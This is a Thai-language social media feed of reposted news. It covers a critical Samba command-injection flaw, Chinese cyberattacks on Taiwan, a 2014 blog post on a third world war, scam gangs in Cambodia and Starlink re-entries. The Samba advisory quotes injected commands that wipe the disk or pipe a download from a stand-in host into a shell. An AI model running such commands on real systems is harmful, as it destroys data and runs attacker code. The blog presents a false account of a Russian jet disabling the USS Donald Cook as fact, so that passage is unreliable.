ซึ่งเปิดช่องให้แฮกเกอร์แทรกคำสั่งอันตราย เช่น ; rm -rf / หรือ | curl malicious.site | bash เนื่องจาก WINS เป็นโปรโตคอลเก่าที่เชื่อถือข้อมูลจาก client โดยไม่ตรวจสอบอย่างเข้มงวด ผู้โจมตีสามารถส่งชื่อ NetBIOS ที่มีความยาวไม่เกิน 15 ตัวอักษรและแฝงตัวอักขระ shell เพื่อรันคำสั่งบนเครื่องเป้าหมายได้ทันที ช่องโหว่นี้มีผลเฉพาะกับ Samba ที่ทำหน้าที่เป็น Active Directory Domain Controller และเปิดใช้งาน WINS พร้อมตั้งค่า “wins hook” เท่านั้น ส่วน Samba ที่เป็น member server หรือ standalone host จะไม่ได้รับผลกระทบ ทีม Samba แนะนำให้ผู้ดูแลระบบ: 🚑 ลบหรือไม่ตั้งค่า “wins hook” ใน smb.conf 🚑 ปิดการใช้งาน WINS server (wins support = no) 🚑 อัปเดตเป็นเวอร์ชันที่ปลอดภัย เช่น 4.23.2, 4.22.5 หรือ 4.21.9 ✅ ข้อมูลในข่าว ➡️ ช่องโหว่ CVE-2025-10230 มีคะแนน CVSS 10.0 เต็ม ➡️ เกิดจากการใช้ข้อมูลจาก client โดยไม่ตรวจสอบก่อนส่งเข้า shell ➡️ ส่งผลให้สามารถรันคำสั่งจากระยะไกลโดยไม่ต้องยืนยันตัวตน ➡️ มีผลเฉพาะกับ Samba AD DC ที่เปิด WINS และตั้งค่า “wins hook” ➡️ WINS เป็นโปรโตคอลเก่าที่เชื่อถือ client โดยไม่ตรวจสอบ ➡️ NetBIOS name ที่มี shell metacharacters เช่น ; หรือ | สามารถใช้โจมตีได้ ➡️ Samba ที่ไม่ใช่ domain controllerจะไม่ถูกกระทบ ➡️ วิธีแก้ไขคือ ลบ “wins hook” หรือปิด WINS (wins support = no) ➡️ เวอร์ชันที่ปลอดภัย ได้แก่ 4.23.2, 4.22.5 และ 4.21.9 ➡️ “wins hook” อาจถูกยกเลิกในเวอร์ชันอนาคต https://securityonline.info/critical-samba-rce-flaw-cve-2025-10230-cvss-10-0-allows-unauthenticated-command-injection-on-ad-dcs/
    SECURITYONLINE.INFO
    Critical Samba RCE Flaw CVE-2025-10230 (CVSS 10.0) Allows Unauthenticated Command Injection on AD DCs
    Samba released an urgent fix for a Critical (CVSS 10.0) RCE flaw (CVE-2025-10230) allowing unauthenticated command injection on AD DCs when the WINS hook is enabled. Update to 4.23.2.
    0 Comments 0 Shares 157 Views 0 Reviews
  • “ไต้หวันเตือนภัยไซเบอร์จากจีนทวีความรุนแรง” — เมื่อการแฮกและข่าวปลอมกลายเป็นอาวุธก่อนเลือกตั้งปี 2026

    สำนักงานความมั่นคงแห่งชาติของไต้หวัน (NSB) รายงานต่อรัฐสภาว่า ประเทศกำลังเผชิญกับการโจมตีทางไซเบอร์จากจีนอย่างหนัก โดยเฉลี่ยแล้วมีการพยายามเจาะระบบถึง 2.8 ล้านครั้งต่อวัน เพิ่มขึ้น 17% จากปีที่ผ่านมา

    นอกจากการแฮกข้อมูลแล้ว จีนยังดำเนินการรณรงค์ข่าวปลอมผ่าน “กองทัพโทรลออนไลน์” ที่ใช้บัญชีโซเชียลมีเดียกว่า 10,000 บัญชีในการเผยแพร่โพสต์ปลอมมากกว่า 1.5 ล้านรายการ โดยเนื้อหาส่วนใหญ่สนับสนุนจีนและบิดเบือนนโยบายภายในของไต้หวัน รวมถึงการเจรจาการค้ากับสหรัฐฯ

    กลุ่มแฮกเกอร์ที่เกี่ยวข้อง เช่น APT41, Volt Typhoon และ Salt Typhoon มุ่งเป้าไปที่โครงสร้างพื้นฐานสำคัญ เช่น การป้องกันประเทศ โทรคมนาคม พลังงาน และสาธารณสุข โดยใช้มัลแวร์และช่องทางใน dark web เพื่อขโมยข้อมูลและเผยแพร่เนื้อหาบิดเบือน

    จีนปฏิเสธข้อกล่าวหาทั้งหมด และกลับกล่าวหาสหรัฐฯ ว่าเป็น “นักเลงไซเบอร์ตัวจริงของโลก” โดยอ้างว่า NSA เคยโจมตีโครงสร้างพื้นฐานของจีนหลายครั้ง

    ข้อมูลในข่าว
    ไต้หวันเผชิญการโจมตีไซเบอร์จากจีนเฉลี่ย 2.8 ล้านครั้งต่อวัน
    เพิ่มขึ้น 17% จากปีที่ผ่านมา
    จีนใช้บัญชีโทรลกว่า 10,000 บัญชีเผยแพร่โพสต์ปลอมกว่า 1.5 ล้านรายการ
    เนื้อหาส่วนใหญ่สนับสนุนจีนและบิดเบือนนโยบายของไต้หวัน
    กลุ่มแฮกเกอร์ที่เกี่ยวข้อง ได้แก่ APT41, Volt Typhoon, Salt Typhoon
    เป้าหมายคือโครงสร้างพื้นฐานสำคัญ เช่น กลาโหม โทรคมนาคม พลังงาน และสาธารณสุข
    ใช้มัลแวร์และช่องทาง dark web ในการเผยแพร่ข้อมูล
    จีนปฏิเสธข้อกล่าวหาและกล่าวหาสหรัฐฯ ว่าเป็นผู้โจมตีไซเบอร์ตัวจริง

    https://www.techradar.com/pro/security/taiwan-warns-chinese-cyberattacks-are-intensifying
    🛡️ “ไต้หวันเตือนภัยไซเบอร์จากจีนทวีความรุนแรง” — เมื่อการแฮกและข่าวปลอมกลายเป็นอาวุธก่อนเลือกตั้งปี 2026 สำนักงานความมั่นคงแห่งชาติของไต้หวัน (NSB) รายงานต่อรัฐสภาว่า ประเทศกำลังเผชิญกับการโจมตีทางไซเบอร์จากจีนอย่างหนัก โดยเฉลี่ยแล้วมีการพยายามเจาะระบบถึง 2.8 ล้านครั้งต่อวัน เพิ่มขึ้น 17% จากปีที่ผ่านมา นอกจากการแฮกข้อมูลแล้ว จีนยังดำเนินการรณรงค์ข่าวปลอมผ่าน “กองทัพโทรลออนไลน์” ที่ใช้บัญชีโซเชียลมีเดียกว่า 10,000 บัญชีในการเผยแพร่โพสต์ปลอมมากกว่า 1.5 ล้านรายการ โดยเนื้อหาส่วนใหญ่สนับสนุนจีนและบิดเบือนนโยบายภายในของไต้หวัน รวมถึงการเจรจาการค้ากับสหรัฐฯ กลุ่มแฮกเกอร์ที่เกี่ยวข้อง เช่น APT41, Volt Typhoon และ Salt Typhoon มุ่งเป้าไปที่โครงสร้างพื้นฐานสำคัญ เช่น การป้องกันประเทศ โทรคมนาคม พลังงาน และสาธารณสุข โดยใช้มัลแวร์และช่องทางใน dark web เพื่อขโมยข้อมูลและเผยแพร่เนื้อหาบิดเบือน จีนปฏิเสธข้อกล่าวหาทั้งหมด และกลับกล่าวหาสหรัฐฯ ว่าเป็น “นักเลงไซเบอร์ตัวจริงของโลก” โดยอ้างว่า NSA เคยโจมตีโครงสร้างพื้นฐานของจีนหลายครั้ง ✅ ข้อมูลในข่าว ➡️ ไต้หวันเผชิญการโจมตีไซเบอร์จากจีนเฉลี่ย 2.8 ล้านครั้งต่อวัน ➡️ เพิ่มขึ้น 17% จากปีที่ผ่านมา ➡️ จีนใช้บัญชีโทรลกว่า 10,000 บัญชีเผยแพร่โพสต์ปลอมกว่า 1.5 ล้านรายการ ➡️ เนื้อหาส่วนใหญ่สนับสนุนจีนและบิดเบือนนโยบายของไต้หวัน ➡️ กลุ่มแฮกเกอร์ที่เกี่ยวข้อง ได้แก่ APT41, Volt Typhoon, Salt Typhoon ➡️ เป้าหมายคือโครงสร้างพื้นฐานสำคัญ เช่น กลาโหม โทรคมนาคม พลังงาน และสาธารณสุข ➡️ ใช้มัลแวร์และช่องทาง dark web ในการเผยแพร่ข้อมูล ➡️ จีนปฏิเสธข้อกล่าวหาและกล่าวหาสหรัฐฯ ว่าเป็นผู้โจมตีไซเบอร์ตัวจริง https://www.techradar.com/pro/security/taiwan-warns-chinese-cyberattacks-are-intensifying
    WWW.TECHRADAR.COM
    Taiwan warns Chinese cyberattacks are intensifying
    Breaches and misinformation campaigns are rampant
    0 Comments 0 Shares 196 Views 0 Reviews
  • แกะรอยสงครามโลกครั้งที่ 3 ตอนที่ 11
    นิทานเรื่องจริง เรื่อง “แกะรอยสงครามโลกครั้งที่ 3”
    ตอนที่ 11

    เรื่องต่อมา คือเรื่องกำลังอาวุธของทั้ง 2 ฝ่าย

    อเมริกา ทำการบ้านมากมาย เพื่อให้รู้แน่ถึงศักยภาพของฝั่งรัสเซีย ไอ้พวกถังความคิดต่างๆ ทำงานเสียหน้ามืด แต่ขอทีเถิดนะ ที่หลังอย่าลอกการบ้านกัน หลอกเอาเงินสปอนเซอร์แบบนี้ คนอ่านแก่ๆ อย่างผม อ่านแล้วเสียอารมณ์ เห็นหน้าปกเป็นถังใหม่ ข้างในลอกกันเพียบ อย่างนี้มันน่าจะเป็นถังขยะ มากกว่าถังความคิด

    ต่อครับ อเมริกาคิดว่าตัวต่อตัว ระหว่างอเมริกากับรัสเซีย อเมริกาล้มรัสเซียได้ แต่พรรคพวกของรัสเซียนะซิ โดยเฉพาะจีนและอิหร่าน มีของจริงมากน้อยน่ากลัวแค่ไหน อเมริกาประเมินเรื่องกำลังอาวุธของจีนต่ำตลอด ถึงขนาดในการประชุมที่ Shangrila Dialogue ที่ เน้นเรื่องความมั่นคงของประเทศ ที่จัดเป็นประจำทุกปีที่สิงคโปร์ อเมริกาเคยปรามาสจีนอย่างไร้มรรยาท จนจีนไม่เข้าร่วมอยู่พักหนึ่ง ตอนนี้ก็ไม่แน่ว่าอเมริการู้จริงถึงศักยภาพอาวุธของจีน เพราะจีนปิดเงียบ ไม่มีการโม้ ไม่มีการโชว์

    แต่ที่อเมริกาให้เวลาในการวิเคราะห์มากมายอีกประเทศหนึ่ง คือ อิหร่าน เพราะอเมริกาคิดว่า อาวุธที่ทรงอานุภาพที่สุด และเป็นตัวตัดสินคือ อาวุธนิวเคลียร์ และอเมริกาคิดว่า อิหร่านพัฒนาอาวุธนิวเคลียร์มานานแล้ว อเมริกาถึงกับชักใย ให้สหประชาชาติใช้มาตรการคว่ำบาตรกับอิหร่าน

    อิหร่านพัฒนานิวเคลียร์จริงหรือไม่ อิหร่านบอกว่าไม่ได้ทำ แต่ถ้าเรื่องนี้กลับตาลปัตร พูดได้คำเดียวว่า “แหลก” ฝ่ายไหนแหลก ก็ลองประเมินกันเองบ้างครับ

    กรณีอิหร่าน ทำให้พอมองเห็นแนวคิดของอเมริกาเกี่ยวกับเรื่องอาวุธ เมื่ออเมริกาคิดว่านิวเคลียร์คืออาวุธที่ทรงอานุภาพที่สุด และเป็นตัวตัดสิน อเมริกาจึงเน้นการพัฒนาอาวุธนิวเคลียร์และบรรดาที่เป็น hardware เป็น ส่วนมาก เช่น เรือรบ เรือบรรทุกเครื่องบิน รถถัง เครื่องบิน ฯลฯ เพื่อสร้างความคล่องตัวในการเคลื่อนไหว เคลื่อนที่ ล๊อกเป้า เป็นต้น

    สิ่งที่น่าสนใจ และอเมริกาอาจจะไม่ให้ความสนใจพอในตอนแรก คือจีน เป็นประเทศที่มีความก้าวหน้าในเรื่องการพัฒนาระบบไอทีอย่าง มาก อาวุธที่จีนพัฒนามาใช้ อาจไม่ใช่ในรูปแบบ hardware ทั้งหมด แต่เป็นรูปแบบไอที software ถ้าจีนพัฒนา software ที่สามารถสยบอาวุธหลากหลายของอเมริกาได้ สงครามครั้งนี้คงมีการสู้รบ รูปแบบต่างกับสมัยสงครามโลกครั้งที่ 2 อย่างแน่นอน และ มีความเป็นไปได้สูงมาก อย่าลืมว่าทางฝั่งของรัสเซีย นอกจากจีนแล้ว ยังมีอินเดียที่เป็นกูรูอีกรายในด้านไอที และถ้าฝั่งนี้เขาแชร์เทคโนโลยี่กัน คงเป็นเรื่องน่าสนใจมาก และน่าคิดและน่ากังวลมากสำหรับอเมริกา
    ตัวอย่างที่ทำให้น่าคิดว่า เรื่องความก้าวหน้าทางเทคโนโลยี software ทางฝั่งรัสเซียและจีน ไม่ใช่เรื่องเกินจินตนาการคือ ข่าวเกี่ยวกับระบบ Sukhoi 24 หรือ Su-24 ของรัสเซียที่สยบเรือรบสัญชาติอเมริกาขื่อ USS Donald Cook เมื่อกลางปีนี้ ที่มีข่าวจาก Veterans Today เมื่อวันที่ 13 พฤศจิกายน 2014 ว่า

    เรือรบสัญชาติอเมริกันชื่อ “USS Donald Cook” ซึ่งติดตั้งระบบ“Aegis” ที่ เป็นระบบที่ไฮเทคที่สุดของอเมริกา ที่สามารถใช้ทำการโจมตีและต่อสู้จรวดทางอากาศ ได้ไปลอยลำโชว์ตัวพร้อมจรวดโทมาฮอค เย้ยรัสเซียที่แถบทะเลดำเมื่อวันที่ 10 เมษายน ค.ศ.2014 ที่ผ่านมา การเข้าไปในน่านน้ำของ Donald Cook เป็นการฝ่าฝืน Montreux Convention ด้านประเภทและระยะเวลา

    รัสเซียไม่ได้ใช้อาวุธขับไล่ Donald Cook เพียงแต่ส่งเครื่องบินรบที่ติดตั้งระบบเรียกว่า Sukhoi 24 หรือ Su-24 ไปบินวนรอบเรือรบDonald Cook ซึ่งจับสัญญาณเครื่องบินรบรัสเซียได้ เครื่องเตือนภัยของเรือรบทำการ แจ้ง แต่หลังจากนั้นแป๊บเดียว ระบบอิเลคทรอนิคทั้งปวงของ Donald Cook ก็ล่ม จอดับมืด ว่างสะอาดเกลี้ยงเกลา และไม่สามารถทำการกู้ระบบได้อีกเลย

    ระหว่างนั้นเครื่องบินรบที่ติดระบบ Su-24 ของรัสเซีย ก็บินวนเหนือดาดฟ้า Donald Cook 12 รอบ ก่อนบินจากไป

    เมื่อรู้ตัวว่าถูกลูบคมจนไม่เหลือ Donald Cook ก็รีบแล่นเข้าไปจอดเทียบท่าที่โรมาเนีย รายงานข่าวบอกว่า หลังจากนั้นเจ้าหน้าที่ประจำการ 27 คนของ Donald Cook ก็ ยื่นใบลาออก และไม่มีการแถลงข่าวใดๆจากฝั่งอเมริกา ส่วนทางรัสเซียออกข่าวเพียงว่า เรายังไม่ได้ใช้อาวุธอะไรเลยนะ เพียงแค่ใช้ระบบคลื่นวิทยุทำลายการทำงานของระบบอเมริกันที่ว่าเยี่ยมสุดแค่ นั้นเอง….. และระบบที่ว่านี้ของอเมริกา เขาว่ากองเรือทั้งหมดของ NATO จะติดตั้ง เพื่อใช้ในการต่อสู้กับรัสเซีย หากรัสเซียบุกยูเครน…

    สรุปว่า ด้านอาวุธยุทธโธปกรณ์นั้น ยังตัดสินไม่ขาดว่า ฝ่ายใดจะนำหน้าใคร เพราะมีทั้งเรื่องนิวเคลียร์ hardware และ software ที่ต่างก็ซุ่มพัฒนา แต่ถ้าจีนสามารถสร้างระบบ software ที่สยบระบบที่ใช้กับอาวุธของอเมริกาได้หมด หรือเกือบหมด หนทางชนะสงครามชิงโลกของอเมริกา คงแทบไม่มีได้เห็นเลย !

    สวัสดีครับ
    คนเล่านิทาน
    5 ธค. 2557
    แกะรอยสงครามโลกครั้งที่ 3 ตอนที่ 11 นิทานเรื่องจริง เรื่อง “แกะรอยสงครามโลกครั้งที่ 3” ตอนที่ 11 เรื่องต่อมา คือเรื่องกำลังอาวุธของทั้ง 2 ฝ่าย อเมริกา ทำการบ้านมากมาย เพื่อให้รู้แน่ถึงศักยภาพของฝั่งรัสเซีย ไอ้พวกถังความคิดต่างๆ ทำงานเสียหน้ามืด แต่ขอทีเถิดนะ ที่หลังอย่าลอกการบ้านกัน หลอกเอาเงินสปอนเซอร์แบบนี้ คนอ่านแก่ๆ อย่างผม อ่านแล้วเสียอารมณ์ เห็นหน้าปกเป็นถังใหม่ ข้างในลอกกันเพียบ อย่างนี้มันน่าจะเป็นถังขยะ มากกว่าถังความคิด ต่อครับ อเมริกาคิดว่าตัวต่อตัว ระหว่างอเมริกากับรัสเซีย อเมริกาล้มรัสเซียได้ แต่พรรคพวกของรัสเซียนะซิ โดยเฉพาะจีนและอิหร่าน มีของจริงมากน้อยน่ากลัวแค่ไหน อเมริกาประเมินเรื่องกำลังอาวุธของจีนต่ำตลอด ถึงขนาดในการประชุมที่ Shangrila Dialogue ที่ เน้นเรื่องความมั่นคงของประเทศ ที่จัดเป็นประจำทุกปีที่สิงคโปร์ อเมริกาเคยปรามาสจีนอย่างไร้มรรยาท จนจีนไม่เข้าร่วมอยู่พักหนึ่ง ตอนนี้ก็ไม่แน่ว่าอเมริการู้จริงถึงศักยภาพอาวุธของจีน เพราะจีนปิดเงียบ ไม่มีการโม้ ไม่มีการโชว์ แต่ที่อเมริกาให้เวลาในการวิเคราะห์มากมายอีกประเทศหนึ่ง คือ อิหร่าน เพราะอเมริกาคิดว่า อาวุธที่ทรงอานุภาพที่สุด และเป็นตัวตัดสินคือ อาวุธนิวเคลียร์ และอเมริกาคิดว่า อิหร่านพัฒนาอาวุธนิวเคลียร์มานานแล้ว อเมริกาถึงกับชักใย ให้สหประชาชาติใช้มาตรการคว่ำบาตรกับอิหร่าน อิหร่านพัฒนานิวเคลียร์จริงหรือไม่ อิหร่านบอกว่าไม่ได้ทำ แต่ถ้าเรื่องนี้กลับตาลปัตร พูดได้คำเดียวว่า “แหลก” ฝ่ายไหนแหลก ก็ลองประเมินกันเองบ้างครับ กรณีอิหร่าน ทำให้พอมองเห็นแนวคิดของอเมริกาเกี่ยวกับเรื่องอาวุธ เมื่ออเมริกาคิดว่านิวเคลียร์คืออาวุธที่ทรงอานุภาพที่สุด และเป็นตัวตัดสิน อเมริกาจึงเน้นการพัฒนาอาวุธนิวเคลียร์และบรรดาที่เป็น hardware เป็น ส่วนมาก เช่น เรือรบ เรือบรรทุกเครื่องบิน รถถัง เครื่องบิน ฯลฯ เพื่อสร้างความคล่องตัวในการเคลื่อนไหว เคลื่อนที่ ล๊อกเป้า เป็นต้น สิ่งที่น่าสนใจ และอเมริกาอาจจะไม่ให้ความสนใจพอในตอนแรก คือจีน เป็นประเทศที่มีความก้าวหน้าในเรื่องการพัฒนาระบบไอทีอย่าง มาก อาวุธที่จีนพัฒนามาใช้ อาจไม่ใช่ในรูปแบบ hardware ทั้งหมด แต่เป็นรูปแบบไอที software ถ้าจีนพัฒนา software ที่สามารถสยบอาวุธหลากหลายของอเมริกาได้ สงครามครั้งนี้คงมีการสู้รบ รูปแบบต่างกับสมัยสงครามโลกครั้งที่ 2 อย่างแน่นอน และ มีความเป็นไปได้สูงมาก อย่าลืมว่าทางฝั่งของรัสเซีย นอกจากจีนแล้ว ยังมีอินเดียที่เป็นกูรูอีกรายในด้านไอที และถ้าฝั่งนี้เขาแชร์เทคโนโลยี่กัน คงเป็นเรื่องน่าสนใจมาก และน่าคิดและน่ากังวลมากสำหรับอเมริกา ตัวอย่างที่ทำให้น่าคิดว่า เรื่องความก้าวหน้าทางเทคโนโลยี software ทางฝั่งรัสเซียและจีน ไม่ใช่เรื่องเกินจินตนาการคือ ข่าวเกี่ยวกับระบบ Sukhoi 24 หรือ Su-24 ของรัสเซียที่สยบเรือรบสัญชาติอเมริกาขื่อ USS Donald Cook เมื่อกลางปีนี้ ที่มีข่าวจาก Veterans Today เมื่อวันที่ 13 พฤศจิกายน 2014 ว่า เรือรบสัญชาติอเมริกันชื่อ “USS Donald Cook” ซึ่งติดตั้งระบบ“Aegis” ที่ เป็นระบบที่ไฮเทคที่สุดของอเมริกา ที่สามารถใช้ทำการโจมตีและต่อสู้จรวดทางอากาศ ได้ไปลอยลำโชว์ตัวพร้อมจรวดโทมาฮอค เย้ยรัสเซียที่แถบทะเลดำเมื่อวันที่ 10 เมษายน ค.ศ.2014 ที่ผ่านมา การเข้าไปในน่านน้ำของ Donald Cook เป็นการฝ่าฝืน Montreux Convention ด้านประเภทและระยะเวลา รัสเซียไม่ได้ใช้อาวุธขับไล่ Donald Cook เพียงแต่ส่งเครื่องบินรบที่ติดตั้งระบบเรียกว่า Sukhoi 24 หรือ Su-24 ไปบินวนรอบเรือรบDonald Cook ซึ่งจับสัญญาณเครื่องบินรบรัสเซียได้ เครื่องเตือนภัยของเรือรบทำการ แจ้ง แต่หลังจากนั้นแป๊บเดียว ระบบอิเลคทรอนิคทั้งปวงของ Donald Cook ก็ล่ม จอดับมืด ว่างสะอาดเกลี้ยงเกลา และไม่สามารถทำการกู้ระบบได้อีกเลย ระหว่างนั้นเครื่องบินรบที่ติดระบบ Su-24 ของรัสเซีย ก็บินวนเหนือดาดฟ้า Donald Cook 12 รอบ ก่อนบินจากไป เมื่อรู้ตัวว่าถูกลูบคมจนไม่เหลือ Donald Cook ก็รีบแล่นเข้าไปจอดเทียบท่าที่โรมาเนีย รายงานข่าวบอกว่า หลังจากนั้นเจ้าหน้าที่ประจำการ 27 คนของ Donald Cook ก็ ยื่นใบลาออก และไม่มีการแถลงข่าวใดๆจากฝั่งอเมริกา ส่วนทางรัสเซียออกข่าวเพียงว่า เรายังไม่ได้ใช้อาวุธอะไรเลยนะ เพียงแค่ใช้ระบบคลื่นวิทยุทำลายการทำงานของระบบอเมริกันที่ว่าเยี่ยมสุดแค่ นั้นเอง….. และระบบที่ว่านี้ของอเมริกา เขาว่ากองเรือทั้งหมดของ NATO จะติดตั้ง เพื่อใช้ในการต่อสู้กับรัสเซีย หากรัสเซียบุกยูเครน… สรุปว่า ด้านอาวุธยุทธโธปกรณ์นั้น ยังตัดสินไม่ขาดว่า ฝ่ายใดจะนำหน้าใคร เพราะมีทั้งเรื่องนิวเคลียร์ hardware และ software ที่ต่างก็ซุ่มพัฒนา แต่ถ้าจีนสามารถสร้างระบบ software ที่สยบระบบที่ใช้กับอาวุธของอเมริกาได้หมด หรือเกือบหมด หนทางชนะสงครามชิงโลกของอเมริกา คงแทบไม่มีได้เห็นเลย ! สวัสดีครับ คนเล่านิทาน 5 ธค. 2557
    0 Comments 0 Shares 257 Views 0 Reviews
  • ผู้นำเกาหลีใต้สั่งเร่งช่วยเหลือเหยื่อสแกมเมอร์ หวั่นนักศึกษาถูกทรมานตายซ้ำรอย เตือนเลี่ยงไปกัมพูชา!
    https://www.thai-tai.tv/news/21900/
    .
    #ไทยไท #เกาหลีใต้ #กัมพูชา #แก๊งสแกมเมอร์ #ลักพาตัว #อีแจมยอง #ยกระดับเตือนภัย


    ผู้นำเกาหลีใต้สั่งเร่งช่วยเหลือเหยื่อสแกมเมอร์ หวั่นนักศึกษาถูกทรมานตายซ้ำรอย เตือนเลี่ยงไปกัมพูชา! https://www.thai-tai.tv/news/21900/ . #ไทยไท #เกาหลีใต้ #กัมพูชา #แก๊งสแกมเมอร์ #ลักพาตัว #อีแจมยอง #ยกระดับเตือนภัย
    0 Comments 0 Shares 128 Views 0 Reviews
  • หลักฐานชี้ชัด แก๊งคอลเซ็นเตอร์จีนในกัมพูชา ลักพาตัว-ฆ่าพลเมืองโสมขาว เกาหลีใต้จี้รัฐบาลเขมรตั้งแผนกเฉพาะกิจ
    https://www.thai-tai.tv/news/21898/
    .
    #ไทยไท #อาชญากรรมข้ามชาติ #แก๊งคอลเซ็นเตอร์ #นักศึกษาเกาหลีใต้ #กัมพูชา #ยกระดับเตือนภัย #ฆาตกรรม

    หลักฐานชี้ชัด แก๊งคอลเซ็นเตอร์จีนในกัมพูชา ลักพาตัว-ฆ่าพลเมืองโสมขาว เกาหลีใต้จี้รัฐบาลเขมรตั้งแผนกเฉพาะกิจ https://www.thai-tai.tv/news/21898/ . #ไทยไท #อาชญากรรมข้ามชาติ #แก๊งคอลเซ็นเตอร์ #นักศึกษาเกาหลีใต้ #กัมพูชา #ยกระดับเตือนภัย #ฆาตกรรม
    0 Comments 0 Shares 161 Views 0 Reviews
  • “ดาวเทียม Starlink ตกทุกวัน — นักวิทยาศาสตร์เตือนภัยเงียบจากขยะอวกาศและผลกระทบต่อชั้นบรรยากาศ”

    ในปี 2025 นี้ นักดาราศาสตร์จาก Harvard–Smithsonian Center for Astrophysics อย่าง Dr. Jonathan McDowell เปิดเผยว่า “มีดาวเทียม Starlink ตกกลับสู่โลกวันละ 1–2 ดวง และอาจเพิ่มเป็น 5 ดวงต่อวันในอนาคต” เนื่องจากอายุการใช้งานเฉลี่ยของดาวเทียมเหล่านี้อยู่ที่ประมาณ 5 ปี ก่อนจะถูกลดวงโคจรและเผาไหม้ในชั้นบรรยากาศ

    แม้ SpaceX จะออกแบบให้ดาวเทียม Starlink เผาไหม้หมดก่อนถึงพื้นโลก แต่ก็มีบางกรณีที่ชิ้นส่วนหลงเหลือ เช่น แคปซูล Dragon ที่เคยตกลงในพื้นที่ห่างไกลของ North Carolina ซึ่ง NASA ยืนยันว่าเป็นเศษซากจากภารกิจจริง

    ปัจจุบันมีดาวเทียมในวงโคจรต่ำ (LEO) ประมาณ 12,000 ดวง โดย 8,500 ดวงเป็นของ Starlink และมีแผนจะเพิ่มเป็น 30,000 ดวงในไม่กี่ปีข้างหน้า ขณะที่บริษัทอื่น เช่น Amazon Kuiper และ ESpace ก็มีแผนส่งดาวเทียมหลายหมื่นดวงเช่นกัน รวมถึงจีนที่มีแผนสร้างระบบสื่อสารอิสระในอวกาศ

    นอกจากดาวเทียม ยังมีเศษขยะอวกาศขนาดเซนติเมตรอีกกว่า 1 ล้านชิ้นที่ไม่สามารถติดตามได้ ซึ่งอาจเป็นตัวจุดชนวนให้เกิด “Kessler Syndrome” หรือปรากฏการณ์ที่การชนกันของวัตถุในอวกาศทำให้เกิดเศษซากเพิ่มขึ้นแบบลูกโซ่ จนวงโคจรกลายเป็นพื้นที่อันตราย

    แม้การตกของ Starlink จะไม่เป็นอันตรายโดยตรงต่อมนุษย์ แต่นักวิทยาศาสตร์เริ่มกังวลถึงผลกระทบต่อชั้นบรรยากาศ เช่น อนุภาคอะลูมิเนียมออกไซด์ที่เกิดจากการเผาไหม้ ซึ่งอาจเปลี่ยนแปลงเคมีและอุณหภูมิของชั้นบรรยากาศในระยะยาว

    ข้อมูลสำคัญจากข่าว
    มีดาวเทียม Starlink ตกกลับสู่โลกวันละ 1–2 ดวงในปี 2025
    คาดว่าอาจเพิ่มเป็น 5 ดวงต่อวันเมื่อมีการส่งดาวเทียมเพิ่ม
    อายุการใช้งานเฉลี่ยของดาวเทียมคือ 5 ปี ก่อนถูกลดวงโคจรและเผาไหม้
    ปัจจุบันมีดาวเทียมในวงโคจรต่ำประมาณ 12,000 ดวง โดย 8,500 ดวงเป็นของ Starlink
    บริษัทอื่น เช่น Amazon Kuiper และจีน มีแผนส่งดาวเทียมหลายหมื่นดวง
    มีเศษขยะอวกาศขนาดเซนติเมตรกว่า 1 ล้านชิ้นที่ไม่สามารถติดตามได้
    Starlink ออกแบบให้เผาไหม้หมดก่อนถึงพื้นโลก แต่บางชิ้นส่วนอาจตกถึงพื้น
    NASA ยืนยันว่ามีชิ้นส่วนจากแคปซูล Dragon ตกลงใน North Carolina
    นักวิทยาศาสตร์เริ่มศึกษาผลกระทบจากอนุภาคอะลูมิเนียมออกไซด์ต่อชั้นบรรยากาศ

    ข้อมูลเสริมจากภายนอก
    Kessler Syndrome คือปรากฏการณ์ที่การชนกันของวัตถุในอวกาศทำให้เกิดเศษซากเพิ่มขึ้นแบบลูกโซ่
    การเผาไหม้ในชั้นบรรยากาศเกิดที่ระดับประมาณ 40 ไมล์เหนือพื้นโลก
    ดาวเทียม Starlink มีขนาดประมาณ 30 เมตร และหนักถึง 1 ตัน
    การแยกแยะดาวเทียมกับอุกกาบาตในท้องฟ้าทำได้จากความเร็วและทิศทางการเคลื่อนที่
    การควบคุมการตกของดาวเทียมยังเป็น “การช่วยเหลือแบบไม่สามารถควบคุมได้เต็มที่”

    https://www.tomshardware.com/networking/concerns-grow-after-spate-of-social-media-posts-showing-spacex-starlink-satellites-burning-in-the-sky-we-are-currently-seeing-a-couple-of-satellite-re-entries-a-day-says-respected-astrophysicist
    🌌 “ดาวเทียม Starlink ตกทุกวัน — นักวิทยาศาสตร์เตือนภัยเงียบจากขยะอวกาศและผลกระทบต่อชั้นบรรยากาศ” ในปี 2025 นี้ นักดาราศาสตร์จาก Harvard–Smithsonian Center for Astrophysics อย่าง Dr. Jonathan McDowell เปิดเผยว่า “มีดาวเทียม Starlink ตกกลับสู่โลกวันละ 1–2 ดวง และอาจเพิ่มเป็น 5 ดวงต่อวันในอนาคต” เนื่องจากอายุการใช้งานเฉลี่ยของดาวเทียมเหล่านี้อยู่ที่ประมาณ 5 ปี ก่อนจะถูกลดวงโคจรและเผาไหม้ในชั้นบรรยากาศ แม้ SpaceX จะออกแบบให้ดาวเทียม Starlink เผาไหม้หมดก่อนถึงพื้นโลก แต่ก็มีบางกรณีที่ชิ้นส่วนหลงเหลือ เช่น แคปซูล Dragon ที่เคยตกลงในพื้นที่ห่างไกลของ North Carolina ซึ่ง NASA ยืนยันว่าเป็นเศษซากจากภารกิจจริง ปัจจุบันมีดาวเทียมในวงโคจรต่ำ (LEO) ประมาณ 12,000 ดวง โดย 8,500 ดวงเป็นของ Starlink และมีแผนจะเพิ่มเป็น 30,000 ดวงในไม่กี่ปีข้างหน้า ขณะที่บริษัทอื่น เช่น Amazon Kuiper และ ESpace ก็มีแผนส่งดาวเทียมหลายหมื่นดวงเช่นกัน รวมถึงจีนที่มีแผนสร้างระบบสื่อสารอิสระในอวกาศ นอกจากดาวเทียม ยังมีเศษขยะอวกาศขนาดเซนติเมตรอีกกว่า 1 ล้านชิ้นที่ไม่สามารถติดตามได้ ซึ่งอาจเป็นตัวจุดชนวนให้เกิด “Kessler Syndrome” หรือปรากฏการณ์ที่การชนกันของวัตถุในอวกาศทำให้เกิดเศษซากเพิ่มขึ้นแบบลูกโซ่ จนวงโคจรกลายเป็นพื้นที่อันตราย แม้การตกของ Starlink จะไม่เป็นอันตรายโดยตรงต่อมนุษย์ แต่นักวิทยาศาสตร์เริ่มกังวลถึงผลกระทบต่อชั้นบรรยากาศ เช่น อนุภาคอะลูมิเนียมออกไซด์ที่เกิดจากการเผาไหม้ ซึ่งอาจเปลี่ยนแปลงเคมีและอุณหภูมิของชั้นบรรยากาศในระยะยาว ✅ 